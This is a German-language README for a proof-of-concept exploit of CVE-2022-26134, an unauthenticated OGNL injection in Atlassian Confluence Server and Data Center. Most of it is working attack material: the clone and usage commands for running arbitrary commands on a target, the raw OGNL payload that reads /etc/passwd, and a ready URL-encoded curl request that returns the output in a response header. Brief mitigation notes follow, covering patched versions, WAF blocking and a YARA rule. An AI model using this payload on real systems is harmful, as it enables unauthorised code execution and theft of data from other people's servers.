
Proof-of-concept-Exploit für CVE-2022-26134, eine nicht authentifizierte OGNL-Injection-Schwachstelle in Atlassian Confluence Server und Data Center, die Remote-Code-Ausführung ermöglicht.
Proof-of-Concept-Skript, das die Sicherheitslücke zur Remote-Code-Ausführung ausnutzt, die Atlassian Confluence 7.18 und niedrigere Produkte betrifft. Die OGNL-Injection-Schwachstelle ermöglicht es einem nicht authentifizierten Benutzer, beliebigen Code auf einer Confluence-Server- oder Data-Center-Instanz auszuführen.
Alle unterstützten Versionen von Confluence Server und Data Center sind betroffen.
Confluence-Server- und Data-Center-Versionen nach 1.3.0 und unterhalb von 7.18.1 sind betroffen.
Die Sicherheitslücke hat einen CVSS-Score von 10 von 10 für Kritikalität.
Repository klonen
git clone https://gitlab.com/Naqwada/cve-2022-26134
cd CVE-2022-26134
Dann kann der Exploit mit dem gewünschten Befehl wie folgt ausgeführt werden:
python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Beispiel mit CURL-Befehl:
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
Das Ergebnis des Befehls wird dann im Parameter X-Cmd-Response im Antwortheader angezeigt.
Folgen Sie den offiziellen Empfehlungen von Atlassian:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian hat die Versionen 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 und 7.18.1 veröffentlicht, die einen Patch für dieses Problem enthalten.
Diese Sicherheitslücke betrifft alle selbst gehosteten Instanzen. Wenn Sie eine WAF verwenden, können Sie URLs mit ${ darin blockieren.
YARA (von Volexity): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar
NUR FÜR BILDUNGSZWECKE.
